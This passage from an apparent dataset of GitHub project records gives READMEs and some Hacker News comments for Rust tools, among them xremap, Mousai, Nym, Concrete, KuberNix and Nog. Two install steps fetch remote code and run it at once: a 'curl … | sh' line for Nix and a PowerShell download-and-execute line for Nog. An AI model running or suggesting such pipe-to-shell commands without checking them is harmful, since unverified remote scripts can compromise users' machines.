...]\n```\n\nThe application name can be specified as a normal string to exactly match the name,\nor a regex surrounded by `/`s like `/application/`.\n\nTo check the application names, you can use the following commands:\n\n#### X11\n\n```\n$ wmctrl -x -l\n0x02800003 0 slack.Slack ubuntu-jammy Slack | general | ruby-jp\n0x05400003 0 code.Code ubuntu-jammy application.rs - xremap - Visual Studio Code\n```\n\nYou may use the entire string of the third column (`slack.Slack`, `code.Code`),\nor just the last segment after `.` (`Slack`, `Code`).\n\n#### GNOME Wayland\n\n```\nbusctl --user call org.gnome.Shell /com/k0kubun/Xremap com.k0kubun.Xremap WMClass\n```\n\n#### Sway\n\n```\nswaymsg -t get_tree\n```\n\nLocate `app_id` in the output.\n\n#### application-specific key overrides\n\nSometimes you want to define a generic key map that is available in all applications, but give specific keys in that map their own definition in specific applications. You can do this by putting the generic map at the bottom of the config, after any specific overrides, as follows.\n\n```yml\n# Emacs-style word-forward and word-back\nkeymap:\n - name: override to make libreoffice-writer go to end of word but before final space like emacs\n application:\n only: libreoffice-writter\n remap:\n Alt-f: [right, C-right, left]\n - name: generic for all apps\n remap:\n Alt-f: C-right\n Alt-b: C-left\n```\n\nNote how Alt-f and Alt-b work in all apps, but the definition of Alt-f is slightly different in LibreOffice Writer. When that app is active, the first definition overrides the second definition; but for any other app, only the second definition is found. This is because xremap uses the first matching definition that it finds.\n\n### virtual\\_modifiers\n\nYou can declare keys that should act like a modifier.\n\n```yml\nvirtual_modifiers:\n - CapsLock\nkeymap:\n - remap:\n CapsLock-i: Up\n CapsLock-j: Left\n CapsLock-k: Down\n CapsLock-l: Right\n```\n\n### keypress_delay_ms\n\nSome applications have trouble understanding synthesized key events, especially on\nWayland. `keypress_delay_ms` can be used to workaround the issue.\nSee [#179](https://github.com/k0kubun/xremap/issues/179) for the detail.\n\n## License\n\n`xremap` is available as open source under the terms of the [MIT License](https://opensource.org/licenses/MIT).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "SeaDve/Mousai", "link": "https://github.com/SeaDve/Mousai", "tags": ["gnome", "shazam-like", "linux"], "stars": 681, "description": "Identify songs in seconds", "lang": "Rust", "repo_lang": "", "readme": "

\n \"Mousai\"\n
\n Mousai\n

\n\n

\n Identify songs in seconds\n

\n\n

\n \n \"Download\n \n
\n \n \"Donate\n \n

\n\n
\n\n

\n \n \"Translation\n \n \n \"Build\n \n \n \"Flathub\n \n \n \"Packaging\n \n

\n\n
\n\n

\n \"Preview\"/\n

\n\nDiscover songs you are aching to know with an easy-to-use interface.\n\nMousai is a simple application that can identify songs similar to Shazam. Just\nclick the listen button, and then wait a few seconds. It will magically return\nthe title and artist of that song!\n\nNote: This uses the API of audd.io, so it is necessary to log in to their site to get more trials.\n\nWhy you will love Mousai?\n* \ud83c\udfb5 Identify the title and artist of the song within seconds.\n* \ud83c\udf99\ufe0f Use your microphone or audio from desktop.\n* \ud83c\udfb8 Store the identified song including the album art in history.\n* \ud83c\udfbc Preview the identified song with the native player.\n* \ud83c\udf10 Browse and listen the song from different providers.\n* \ud83d\udcf1 Easy-to-use user interface.\n* \u2328\ufe0f User-friendly keyboard shortcuts.\n\n## \ud83c\udf08 AudD\n\nAudD is a music recognition API that makes Mousai possible. For more information,\nyou can check their [Privacy Policy](https://audd.io/privacy/) and [Terms of Services](https://audd.io/terms/).\n\n\n## \ud83c\udfd7\ufe0f Building from source\n\n### GNOME Builder\nGNOME Builder is the environment used for developing this application. It can use Flatpak manifests to create a consistent building and running environment cross-distro. Thus, it is highly recommended you use it.\n\n1. Download [GNOME Builder](https://flathub.org/apps/details/org.gnome.Builder).\n2. In Builder, click the \"Clone Repository\" button at the bottom, using `https://github.com/SeaDve/Mousai.git` as the URL.\n3. Click the build button at the top once the project is loaded.\n\n### Meson\n```\ngit clone https://github.com/SeaDve/Mousai.git\ncd Mousai\nmeson _build --prefix=/usr/local\nninja -C _build install\n```\n\n\n## \ud83d\ude4c Help translate Mousai\nYou can help Mousai translate into your native language. If you found any typos\nor think you can improve a translation, you can use the [Weblate](https://hosted.weblate.org/engage/kooha/) platform.\n\n\n## \u2615 Support me and the project\n\nMousai is free and will always be for everyone to use. If you like the project and\nwould like to support and fund it, you may donate through [Liberapay](https://liberapay.com/SeaDve/).\n\n\n## \ud83d\udc9d Acknowledgment\n\nSpecial thanks to [AudD's API](https://audd.io/) and [contributors](https://github.com/SeaDve/Mousai/graphs/contributors)\nfor making Mousai possible. Also, a warm thanks to the project's [translators](https://hosted.weblate.org/engage/kooha/).\n", "readme_type": "markdown", "hn_comments": "This is just a frontend for AudD, no? Nothing wrong with that, but I got really excited for a moment to see open source, fully local music recognition software.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nymtech/nym", "link": "https://github.com/nymtech/nym", "tags": [], "stars": 681, "description": "Nym provides strong network-level privacy against sophisticated end-to-end attackers, and anonymous transactions using blinded, re-randomizable, decentralized credentials.", "lang": "Rust", "repo_lang": "", "readme": "\n\n## The Nym Privacy Platform\n\nThe platform is composed of multiple Rust crates. Top-level executable binary crates include:\n\n* nym-mixnode - shuffles [Sphinx](https://github.com/nymtech/sphinx) packets together to provide privacy against network-level attackers.\n* nym-client - an executable which you can build into your own applications. Use it for interacting with Nym nodes.\n* nym-socks5-client - a Socks5 proxy you can run on your machine and use with existing applications.\n* nym-gateway - acts sort of like a mailbox for mixnet messages, which removes the need for direct delivery to potentially offline or firewalled devices.\n* nym-network-monitor - sends packets through the full system to check that they are working as expected, and stores node uptime histories as the basis of a rewards system (\"mixmining\" or \"proof-of-mixing\").\n* nym-explorer - a (projected) block explorer and (existing) mixnet viewer.\n* nym-wallet - a desktop wallet implemented using the [Tauri](https://tauri.studio/en/docs/about/intro) framework. \n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg?style=for-the-badge)](https://opensource.org/licenses/Apache-2.0)\n[![Build Status](https://img.shields.io/github/workflow/status/nymtech/nym/Continuous%20integration/develop?style=for-the-badge&logo=github-actions)](https://github.com/nymtech/nym/actions?query=branch%3Adevelop)\n\n\n### Building\n\nPlatform build instructions are available on [our docs site](https://nymtech.net/docs/stable/run-nym-nodes/build-nym).\nWallet build instructions are also available on [our docs site](https://nymtech.net/docs/stable/nym-apps/wallet#for-developers).\n\n### Developing\n\nThere's a `.env.sample-dev` file provided which you can rename to `.env` if you want convenient logging, backtrace, or other environment variables pre-set. The `.env` file is ignored so you don't need to worry about checking it in.\n\nFor Typescript components, please see [ts-packages](./ts-packages).\n\n### Developer chat\n\nYou can chat to us in [Keybase](https://keybase.io). Download their chat app, then click **Teams -> Join a team**. Type **nymtech.friends** into the team name and hit **continue**. For general chat, hang out in the **#general** channel. Our development takes places in the **#dev** channel. Node operators should be in the **#node-operators** channel.\n\n### Rewards\n\nNode, node operator and delegator rewards are determined according to the principles laid out in the section 6 of [Nym Whitepaper](https://nymtech.net/nym-whitepaper.pdf). Below is a TLDR of the variables and formulas involved in calculating the epoch rewards. Initial reward pool is set to 250 million Nym, making the circulating supply 750 million Nym.\n\n|Symbol|Definition|\n|---|---|\n||global share of rewards available, starts at 2% of the reward pool.\n||node reward for mixnode `i`.\n||ratio of total node stake (node bond + all delegations) to the token circulating supply.\n||ratio of stake operator has pledged to their node to the token circulating supply.\n||fraction of total effort undertaken by node `i`, set to `1/k`.\n||number of nodes stakeholders are incentivised to create, set by the validators, a matter of governance. Currently determined by the `reward set` size, and set to 720 in testnet Sandbox.\n||Sybil attack resistance parameter - the higher this parameter is set the stronger the reduction in competitivness gets for a Sybil attacker.\n||declared profit margin of operator `i`, defaults to 10% in.\n||uptime of node `i`, scaled to 0 - 1, for the rewarding epoch\n||cost of operating node `i` for the duration of the rewarding epoch, set to 40 NYMT.\n\nNode reward for node `i` is determined as:\n\n\n\nwhere:\n\n\n\n\nand\n\n\n\n\nOperator of node `i` is credited with the following amount:\n\n\n\n\nDelegate with stake `s` recieves:\n\n\n\n\nwhere `s'` is stake `s` scaled over total token circulating supply.\n\n### Licensing and copyright information\n\nThis program is available as open source under the terms of the Apache 2.0 license. However, some elements are being licensed under CC0-1.0 and MIT. For accurate information, please check individual files.\n\n", "readme_type": "markdown", "hn_comments": "Article is two and a half years old. Anyone have an update on this project?I'm curious how they mitigate Sybil attacks. There doesn't seem to be any elaboration on that point, and any claim to a technique by which to mitigate the problem with no centralization is a very strong claim and needs some type of citation.I think to some extent, the Tor network coordinators are needed to prevent correlation attacks, are they not?I'll keep an eye on Nym, but I am pretty skeptical of any network that relies on a cryptocurrency scheme to operate, especially one with staking like Lokinet. Hypothetically it could work as an incentive structure, but the probabilistic nature of privacy schemes don't bode well, and I think the incentives for HODLing usually displace any actual interest in the network as a service.Additionally, I have a hard time imagining Tor or I2P being displaced due to network effects, especially if it requires purchasing cryptocurrency, which is already pretty difficult.Although the original title is a little clickbait and not exactly correct, this article written by Ania M. Piotrowska, one of Nym\u2019s main researcher, explained in details what are the privacy properties you need against state level mass surveillance.The importance of this article is to see a privacy project introspectively admitting its current limitation. In Nym\u2019s case, it still doesn\u2019t have hidden service, sender anonymity and receiver anonymity. This is the level of transparency we want to see from any privacy project.Having flaws or limitations are okay, but not communicating them with users while advertising itself as a privacy project is just dishonest. I hope to see more articles like this from other privacy projects.Nym explained its ambition to achieve much stronger privacy properties under much stronger threat model. Until then, they can truly claim to protect privacy against state surveillance.Free Software community implementation stemming from the same research: https://katzenpost.mixnetworks.org/For a moment I thought it was the Python documentation tool named Sphinx. Took me a while to understand it is a payload format for a blockchain.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zama-ai/concrete", "link": "https://github.com/zama-ai/concrete", "tags": ["fhe", "tfhe", "homomorphic-encryption", "homomorphic-encryption-library", "paillier", "privacy", "gdpr", "cryptography", "rust"], "stars": 681, "description": "Concrete: State-of-the-art TFHE library for boolean and integer arithmetics.", "lang": "Rust", "repo_lang": "", "readme": "

\n\n \n

\n

\n\n \n \n \n\n \n \n \n\n \n \n \n\n \n \n \n\n \n \n \n\n \n \n \n

\n\n> **Warning**\n>\n> Concrete repository is about to transition from our original TFHE library to our TFHE compiler.\n> For those seeking a TFHE library in Rust, we recommend switching to [TFHE-rs](https://github.com/zama-ai/tfhe-rs).\n\nThe `concrete` ecosystem is a set of crates that implements Zama's variant of\n[TFHE](https://eprint.iacr.org/2018/421.pdf). In a nutshell,\n[fully homomorphic encryption (FHE)](https://en.wikipedia.org/wiki/Homomorphic_encryption), allows\nyou to perform computations over encrypted data, allowing you to implement Zero Trust services.\n\nConcrete is based on the\n[Learning With Errors (LWE)](https://cims.nyu.edu/~regev/papers/lwesurvey.pdf) and the\n[Ring Learning With Errors (RLWE)](https://eprint.iacr.org/2012/230.pdf) problems, which are well\nstudied cryptographic hardness assumptions believed to be secure even against quantum computers.\n\n## Links\n\n- [documentation](https://docs.zama.ai/concrete)\n- [whitepaper](http://whitepaper.zama.ai)\n- [community website](https://community.zama.ai)\n\n## Concrete crates\n\nConcrete is implemented using the [Rust Programming language](https://www.rust-lang.org/), which\nallows very fast, yet very secure implementations.\n\nThe ecosystem is composed of several crates (packages in the Rust language).\nThe crates are split into 2 repositories:\n\n- The `concrete` repository which contains crates intended to be more approachable by\nnon-cryptographers.\n- The [concrete-core](https://github.com/zama-ai/concrete-core) repository which contains the crates\n implementing the low level cryptographic primitives.\n\nThe crates within this repository are:\n- [`concrete`](concrete): A high-level library, useful to cryptographers that want to quickly\n implement homomorphic applications, without having to understand the details of the\n jmplementation.\n- [`concrete-boolean`](concrete-boolean): A high-level library, implementing homomorphic Boolean gates, making it easy\n to run any kind of circuits over encrypted data.\n- [`concrete-shortint`](concrete-shortint): A high-level library, implementing operations on short integers (about 1 to 4 bits).\n- [`concrete-integer`](concrete-integer): A high-level library, implementing operations on integers, construction on top of short integers for values in about 4 to 16 bits.\n\n## Installation\n\nAs `concrete` relies on `concrete-core`, `concrete` is only supported on `x86_64 Linux` and `x86_64 macOS`.\nWindows users can use `concrete` through the `WSL`. For Installation instructions see [Install.md](INSTALL.md)\nor [documentation](https://docs.zama.ai/concrete).\n\n## Getting Started\n\nHere is a simple example of an encrypted addition between two encrypted 8-bit variables. For more\ninformation please read the [documentation](https://docs.zama.ai/concrete).\n\n```rust\nuse concrete::{ConfigBuilder, generate_keys, set_server_key, FheUint8};\nuse concrete::prelude::*;\n\nfn main() {\n let config = ConfigBuilder::all_disabled()\n .enable_default_uint8()\n .build();\n\n let (client_key, server_key) = generate_keys(config);\n\n set_server_key(server_key);\n\n let clear_a = 27u8;\n let clear_b = 128u8;\n\n let a = FheUint8::encrypt(clear_a, &client_key);\n let b = FheUint8::encrypt(clear_b, &client_key);\n\n let result = a + b;\n\n let decrypted_result: u8 = result.decrypt(&client_key);\n\n let clear_result = clear_a + clear_b;\n\n assert_eq!(decrypted_result, clear_result);\n}\n```\n\n## Contributing\n\nThere are two ways to contribute to Concrete:\n\n- you can open issues to report bugs or typos and to suggest new ideas\n- you can ask to become an official contributor by emailing [hello@zama.ai](mailto:hello@zama.ai).\n(becoming an approved contributor involves signing our Contributor License Agreement (CLA))\n\nOnly approved contributors can send pull requests, so please make sure to get in touch before you do!\n\n## Citing Concrete\n\nTo cite Concrete in academic papers, please use the following entry:\n\n```text\n@inproceedings{WAHC:CJLOT20,\n title={CONCRETE: Concrete Operates oN Ciphertexts Rapidly by Extending TfhE},\n author={Chillotti, Ilaria and Joye, Marc and Ligier, Damien and Orfila, Jean-Baptiste and Tap, Samuel},\n booktitle={WAHC 2020--8th Workshop on Encrypted Computing \\& Applied Homomorphic Cryptography},\n volume={15},\n year={2020}\n}\n```\n\n## Credits\n\nThis library uses several dependencies and we would like to thank the contributors of those\nlibraries.\n\nWe thank [Daniel May](https://gitlab.com/danieljrmay) for supporting this project and donating the\n`concrete` crate.\n\n## License\n\nThis software is distributed under the BSD-3-Clause-Clear license. If you have any questions,\nplease contact us at `hello@zama.ai`.\n\n## Disclaimers\n\n### Security Estimation\n\nSecurity estimation, in this repository, used to be based on\nthe [LWE Estimator](https://bitbucket.org/malb/lwe-estimator/src/master/),\nwith `reduction_cost_model = BKZ.sieve`.\nWe are currently moving to the [Lattice Estimator](https://github.com/malb/lattice-estimator)\nwith `red_cost_model = reduction.RC.BDGL16`.\n\nWhen a new update is published in the Lattice Estimator, we update parameters accordingly.\n\n### Side-Channel Attacks\n\nMitigation for side channel attacks have not yet been implemented in Concrete,\nand will be released in upcoming versions.\n", "readme_type": "markdown", "hn_comments": "I've been following these fellows for a bit, and haven't seen them mentioned here. This is a really fascinating product. What do data scientists and ML engineers think of this sort of tech breaking into the market?Last I checked FHE was computationally infeasible for any realistic work load. Has that changed?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "saschagrunert/kubernix", "link": "https://github.com/saschagrunert/kubernix", "tags": ["nix", "kubernetes", "rust", "kubernetes-setup", "nix-shell", "kubernetes-cluster", "kubernetes-deployment", "kubernetes-development"], "stars": 678, "description": "Single dependency Kubernetes clusters for local testing, experimenting and development", "lang": "Rust", "repo_lang": "", "readme": "\n\n[![CircleCI](https://circleci.com/gh/saschagrunert/kubernix.svg?style=shield)](https://circleci.com/gh/saschagrunert/kubernix)\n[![Docs master](https://img.shields.io/badge/doc-master-orange.svg)](https://saschagrunert.github.io/kubernix/doc/kubernix/index.html)\n[![Docs release](https://docs.rs/kubernix/badge.svg)](https://docs.rs/kubernix)\n[![Coverage](https://codecov.io/gh/saschagrunert/kubernix/branch/master/graph/badge.svg)](https://codecov.io/gh/saschagrunert/kubernix)\n[![Dependencies](https://deps.rs/repo/github/saschagrunert/kubernix/status.svg)](https://deps.rs/repo/github/saschagrunert/kubernix)\n[![Crates.io](https://img.shields.io/crates/v/kubernix.svg)](https://crates.io/crates/kubernix)\n[![License MIT](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/saschagrunert/kubernix/blob/master/LICENSE)\n\n## Kubernetes development cluster bootstrapping with Nix packages\n\nThis project aims to provide **single dependency** [Kubernetes][1] clusters\nfor local testing, experimenting and development purposes.\n\n[1]: https://kubernetes.io\n\nMoving pictures are worth more than thousand words, so here is a short demo:\n\n![demo](.github/kubernix.svg)\n\n### Nix?\n\nHave you ever heard about [Nix][2], the functional package manager?\n\nIn case you haven't, don\u2019t worry \u2013 the important thing is that it provides all the third-party\ndependencies needed for this project, pinned to a dedicated version. This guarantees stable,\nreproducible installations.\n\n[2]: https://nixos.org/nix\n\nKuberNix itself is a Rusty helper program, which takes care of bootstrapping\nthe Kubernetes cluster, passing the right configuration parameters around and\nkeeping track of the running processes.\n\n### What is inside\n\nThe following technology stack is currently being used:\n\n| Application | Version |\n| --------------- | ------------ |\n| cfssl | v1.5.0 |\n| cni-plugins | v0.9.0 |\n| conmon | v2.0.25 |\n| conntrack-tools | v1.4.6 |\n| cri-o-wrapper | v1.20.0 |\n| cri-tools | v1.20.0 |\n| etcd | v3.3.25 |\n| iproute2 | v5.10.0 |\n| iptables | v1.8.6 |\n| kmod | v27 |\n| kubectl | v1.19.5 |\n| kubernetes | v1.19.5 |\n| nss-cacert | v3.60 |\n| podman-wrapper | v2.2.1 |\n| runc | v1.0.0-rc92 |\n| socat | v1.7.4.1 |\n| sysctl | v1003.1.2008 |\n| util-linux | v2.36.1 |\n\nSome other tools are not explicitly mentioned here, because they are no\nfirst-level dependencies.\n\n### Single Dependency\n\n#### With Nix\n\nAs already mentioned, there is only one single dependency needed to run this\nproject: **Nix**. To setup Nix, simply run:\n\n```shell\n$ curl https://nixos.org/nix/install | sh\n```\n\nPlease make sure to follow the instructions output by the script.\n\n#### With the Container Runtime of your Choice\n\nIt is also possible to run KuberNix in the container runtime of your choice. To\ndo this, simply grab the latest image from [`saschagrunert/kubernix`][40].\nPlease note that running KuberNix inside a container image requires to run\n`privileged` mode and `host` networking. For example, we can run KuberNix with\n[podman][41] like this:\n\n[40]: https://cloud.docker.com/u/saschagrunert/repository/docker/saschagrunert/kubernix\n[41]: https://github.com/containers/libpod\n\n```\n$ sudo podman run \\\n --net=host \\\n --privileged \\\n -it docker.io/saschagrunert/kubernix:latest\n```\n\n### Getting Started\n\n#### Cluster Bootstrap\n\nTo bootstrap your first cluster, download one of the latest [release binaries][18] or\nbuild the application via:\n\n[18]: https://github.com/saschagrunert/kubernix/releases/latest\n\n```shell\n$ make build-release\n```\n\nThe binary should now be available in the `target/release/kubernix` directory of\nthe project. Alternatively, install the application via `cargo install kubernix`.\n\nAfter the successful binary retrieval, start KuberNix by running it as `root`:\n\n```\n$ sudo kubernix\n```\n\nKuberNix will now take care that the Nix environment gets correctly setup,\ndownloads the needed binaries and starts the cluster. Per default it will create\na directory called `kubernix-run` in the current path which contains all necessary\ndata for the cluster.\n\n#### Shell Environment\n\nIf everything went fine, you should be dropped into a new shell session,\nlike this:\n\n```\n[INFO ] Everything is up and running\n[INFO ] Spawning interactive shell\n[INFO ] Please be aware that the cluster stops if you exit the shell\n>\n```\n\nNow you can access your cluster via tools like `kubectl`:\n\n```\n> kubectl get pods --all-namespaces\nNAMESPACE NAME READY STATUS RESTARTS AGE\nkube-system coredns-85d84dd694-xz997 1/1 Running 0 102s\n```\n\nAll configuration files have been written to the target directory, which is now\nthe current one:\n\n```\n> ls -1\napiserver/\ncontrollermanager/\ncoredns/\ncrio/\nencryptionconfig/\netcd/\nkubeconfig/\nkubelet/\nkubernix.env\nkubernix.toml\nnix/\npki/\npolicy.json\nproxy/\nscheduler/\n```\n\nFor example, the log files for the different running components are now\navailable within their corresponding directory:\n\n```\n> ls -1 **.log\napiserver/kube-apiserver.log\ncontrollermanager/kube-controller-manager.log\ncrio/crio.log\netcd/etcd.log\nkubelet/kubelet.log\nproxy/kube-proxy.log\nscheduler/kube-scheduler.log\n```\n\nIf you want to spawn an additional shell session, simply run `kubernix shell` in\nthe same directory as where the initial bootstrap happened.\n\n```\n$ sudo kubernix shell\n[INFO kubernix] Spawning new kubernix shell in 'kubernix-run'\n> kubectl run --generator=run-pod/v1 --image=alpine -it alpine sh\nIf you don't see a command prompt, try pressing enter.\n/ #\n```\n\nThis means that you can spawn as many shells as you want to.\n\n#### Cleanup\n\nThe whole cluster gets automatically destroyed if you exit the shell session\nfrom the initial process:\n\n```\n> exit\n[INFO ] Cleaning up\n```\n\nPlease note that the directory where all the data is stored is not being\nremoved after the exit of KuberNix. This means that you\u2019re still able to\naccess the log and configuration files for further processing. If you start\nthe cluster again, then the cluster files will be reused. This is especially\nhandy if you want to test configuration changes.\n\n#### Restart\n\nIf you start KuberNix again in the same run directory, then it will re-use the\nconfiguration during the cluster bootstrapping process. This means that you\ncan modify all data inside the run root for testing and debugging purposes. The\nstartup of the individual components will be initiated by YAML files called\n`run.yml`, which are available inside the directories of the corresponding\ncomponents. For example, etc gets started via:\n\n```\n> cat kubernix-run/etcd/run.yml\n```\n\n```yml\n---\ncommand: /nix/store/qlbsv0hvi0j5qj3631dzl9srl75finlk-etcd-3.3.13-bin/bin/etcd\nargs:\n - \"--advertise-client-urls=https://127.0.0.1:2379\"\n - \"--client-cert-auth\"\n - \"--data-dir=/\u2026/kubernix-run/etcd/run\"\n - \"--initial-advertise-peer-urls=https://127.0.0.1:2380\"\n - \"--initial-cluster-state=new\"\n - \"--initial-cluster-token=etcd-cluster\"\n - \"--initial-cluster=etcd=https://127.0.0.1:2380\"\n - \"--listen-client-urls=https://127.0.0.1:2379\"\n - \"--listen-peer-urls=https://127.0.0.1:2380\"\n - \"--name=etcd\"\n - \"--peer-client-cert-auth\"\n - \"--cert-file=/\u2026/kubernix-run/pki/kubernetes.pem\"\n - \"--key-file=/\u2026/kubernix-run/pki/kubernetes-key.pem\"\n - \"--peer-cert-file=/\u2026/kubernix-run/pki/kubernetes.pem\"\n - \"--peer-key-file=/\u2026/kubernix-run/pki/kubernetes-key.pem\"\n - \"--peer-trusted-ca-file=/\u2026/kubernix-run/pki/ca.pem\"\n - \"--trusted-ca-file=/\u2026/kubernix-run/pki/ca.pem\"\n```\n\n### Configuration\n\nKuberNix has some configuration possibilities, which are currently:\n\n| CLI argument | Description | Default | Environment Variable |\n| ------------------------- | ----------------------------------------------------------------------------------- | -------------- | ---------------------------- |\n| `-r, --root` | Path where all the runtime data is stored | `kubernix-run` | `KUBERNIX_ROOT` |\n| `-l, --log-level` | Logging verbosity | `info` | `KUBERNIX_LOG_LEVEL` |\n| `-c, --cidr` | CIDR used for the cluster network | `10.10.0.0/16` | `KUBERNIX_CIDR` |\n| `-s, --shell` | The shell executable to be used | `$SHELL`/`sh` | `KUBERNIX_SHELL` |\n| `-e, --no-shell` | Do not spawn an interactive shell after bootstrap | `false` | `KUBERNIX_NO_SHELL` |\n| `-n, --nodes` | The number of nodes to be registered | `1` | `KUBERNIX_NODES` |\n| `-u, --container-runtime` | The container runtime to be used for the nodes, irrelevant if `nodes` equals to `1` | `podman` | `KUBERNIX_CONTAINER_RUNTIME` |\n| `-o, --overlay` | Nix package overlay to be used | | `KUBERNIX_OVERLAY` |\n| `-p, --packages` | Additional Nix dependencies to be added to the environment | | `KUBERNIX_PACKAGES` |\n\nPlease ensure that the CIDR is not overlapping with existing local networks and\nthat your setup has access to the internet. The CIDR will be automatically split\nup over the necessary cluster components.\n\n#### Multinode Support\n\nIt is possible to spawn multiple worker nodes, too. To do this, simply adjust\nthe `-n, --nodes` command line argument as well as your preferred container\nruntime via `-u, --container-runtime`. The default runtime is [podman][41],\nbut every other Docker drop-in replacement should work out of the box.\n\n#### Overlays\n\nOverlays provide a method to extend and change Nix derivations. This means, that\nwe\u2019re able to change dependencies during the cluster bootstrapping process. For\nexample, we can exchange the used CRI-O version to use a local checkout by\nwriting this simple `overlay.nix`:\n\n```nix\nself: super: {\n cri-o = super.cri-o.overrideAttrs(old: {\n src = ../path/to/go/src/github.com/cri-o/cri-o;\n });\n}\n```\n\nNow we can run KuberNix with the `--overlay, -o` command line argument:\n\n```\n$ sudo kubernix --overlay overlay.nix\n[INFO kubernix] Nix environment not found, bootstrapping one\n[INFO kubernix] Using custom overlay 'overlay.nix'\nthese derivations will be built:\n /nix/store/9jb43i2mqjc94mbx30d9nrx529w6lngw-cri-o-1.15.2.drv\n building '/nix/store/9jb43i2mqjc94mbx30d9nrx529w6lngw-cri-o-1.15.2.drv'...\n```\n\nUsing this technique makes it easy for daily development of Kubernetes\ncomponents, by simply changing it to local paths or trying out new versions.\n\n#### Additional Packages\n\nIt is also possible to add additional packages to the KuberNix environment by\nspecifying them via the `--packages, -p` command line parameter. This way you\ncan easily utilize additional tools in a reproducible way. For example, when to\ncomes to using always the same [Helm][20] version, you could simply run:\n\n```\n$ sudo kubernix -p kubernetes-helm\n[INFO ] Nix environment not found, bootstrapping one\n[INFO ] Bootstrapping cluster inside nix environment\n\u2026\n> helm init\n> helm version\nClient: &version.Version{SemVer:\"v2.14.3\", GitCommit:\"\", GitTreeState:\"clean\"}\nServer: &version.Version{SemVer:\"v2.14.3\", GitCommit:\"0e7f3b6637f7af8fcfddb3d2941fcc7cbebb0085\", GitTreeState:\"clean\"}\n```\n\nAll available packages are listed on the [official Nix index][21].\n\n[20]: https://helm.sh\n[21]: https://nixos.org/nixos/packages.html?channel=nixpkgs-unstable\n\n## Contributing\n\nYou want to contribute to this project? Wow, thanks! So please just fork it and\nsend me a pull request.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "napi-rs/node-rs", "link": "https://github.com/napi-rs/node-rs", "tags": ["napi-rs", "node-api", "nodejs", "crc32c", "bcrypt", "hash", "eslint", "jieba"], "stars": 677, "description": "Node.js bindings \u2764\ufe0f Rust crates ", "lang": "Rust", "repo_lang": "", "readme": "# node-rs\n\n![](https://github.com/napi-rs/node-rs/workflows/CI/badge.svg)\n\nWhen `Node.js` meet `Rust` = \ud83d\ude80\n\n# napi-rs\n\nMake rust crates binding to Node.js use [napi-rs](https://github.com/napi-rs/napi-rs)\n\n# Support matrix\n\n| | node12 | node14 | node16 | node18 |\n| --------------------- | ------ | ------ | ------ | ------ |\n| Windows x64 | \u2713 | \u2713 | \u2713 | \u2713 |\n| Windows x32 | \u2713 | \u2713 | \u2713 | \u2713 |\n| Windows arm64 | \u2713 | \u2713 | \u2713 | \u2713 |\n| macOS x64 | \u2713 | \u2713 | \u2713 | \u2713 |\n| macOS arm64 (m chips) | \u2713 | \u2713 | \u2713 | \u2713 |\n| Linux x64 gnu | \u2713 | \u2713 | \u2713 | \u2713 |\n| Linux x64 musl | \u2713 | \u2713 | \u2713 | \u2713 |\n| Linux arm gnu | \u2713 | \u2713 | \u2713 | \u2713 |\n| Linux arm64 gnu | \u2713 | \u2713 | \u2713 | \u2713 |\n| Linux arm64 musl | \u2713 | \u2713 | \u2713 | \u2713 |\n| Android arm64 | \u2713 | \u2713 | \u2713 | \u2713 |\n| Android armv7 | \u2713 | \u2713 | \u2713 | \u2713 |\n| FreeBSD x64 | \u2713 | \u2713 | \u2713 | \u2713 |\n\n# Packages\n\n| Package | Version | Downloads | Description |\n| -------------------------------------------- | -------------------------------------------------------- | ----------------------------------------------------------------------- | ------------------------------------------------------------------------- |\n| [`@node-rs/crc32`](./packages/crc32) | ![](https://img.shields.io/npm/v/@node-rs/crc32.svg) | ![](https://img.shields.io/npm/dm/@node-rs/crc32.svg?sanitize=true) | Fastest `CRC32` implementation using `SIMD` |\n| [`@node-rs/jieba`](./packages/jieba) | ![](https://img.shields.io/npm/v/@node-rs/jieba.svg) | ![](https://img.shields.io/npm/dm/@node-rs/jieba.svg?sanitize=true) | [`jieba-rs`](https://github.com/messense/jieba-rs) binding |\n| [`@node-rs/bcrypt`](./packages/bcrypt) | ![](https://img.shields.io/npm/v/@node-rs/bcrypt.svg) | ![](https://img.shields.io/npm/dm/@node-rs/bcrypt.svg?sanitize=true) | Fastest bcrypt implementation |\n| [`@node-rs/deno-lint`](./packages/deno-lint) | ![](https://img.shields.io/npm/v/@node-rs/deno-lint.svg) | ![](https://img.shields.io/npm/dm/@node-rs/deno-lint.svg?sanitize=true) | [deno_lint](https://github.com/denoland/deno_lint) Node.js binding |\n| [`@node-rs/xxhash`](./packages/xxhash) | ![](https://img.shields.io/npm/v/@node-rs/xxhash.svg) | ![](https://img.shields.io/npm/dm/@node-rs/xxhash.svg?sanitize=true) | [`xxhash-rust`](https://github.com/DoumanAsh/xxhash-rust) Node.js binding |\n| [`@node-rs/argon2`](./packages/argon2) | ![](https://img.shields.io/npm/v/@node-rs/argon2.svg) | ![](https://img.shields.io/npm/dm/@node-rs/argon2.svg?sanitize=true) | [argon2](https://crates.io/crates/argon2) binding for Node.js. |\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TimUntersberger/nog", "link": "https://github.com/TimUntersberger/nog", "tags": ["tiling-window-manager", "windows-10", "rust"], "stars": 677, "description": "A tiling window manager for Windows", "lang": "Rust", "repo_lang": "", "readme": "# Nog\n\n![preview](https://user-images.githubusercontent.com/32014449/107612664-0490ac00-6c47-11eb-9620-e754aa38b5b0.png)\n\n## Documentation\n\nhttps://timuntersberger.github.io/nog\n\n## Download\n\n### Windows\n\n```powershell\n(iwr \"https://raw.githubusercontent.com/TimUntersberger/nog/master/bin/download_release.ps1\").Content > download.ps1; ./download.ps1 master-release; rm download.ps1\n```\n\n## Known Problems\n\n### Window gets managed on wrong monitor\n\nIf you are using something like PowerLauncher for launching applications you might encounter this problem with `mutli_monitor` enabled.\n\nThe problem is that the focus returns to the previous window after PowerLauncher closes, before spawning the new window.\n\n1. PowerLauncher opens\n2. You tell it to launch notepad for example\n3. PowerLauncher closes -> focus returns to 